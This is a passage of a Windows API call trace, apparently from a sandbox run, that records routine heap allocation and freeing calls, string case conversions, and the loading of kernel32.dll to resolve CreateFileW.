0x43e2320 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0075.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0075.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0075.497] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0075.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0075.497] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0075.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0075.497] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0075.497] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0075.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0075.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0075.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d40 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0075.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0075.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0075.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0075.498] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0075.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0075.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0075.499] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0075.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0075.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0075.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0075.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0075.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0075.502] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0075.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0075.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0075.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0075.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0075.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0075.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0075.506] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0075.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca4d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0075.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0075.507] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0075.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0075.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0075.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.507] 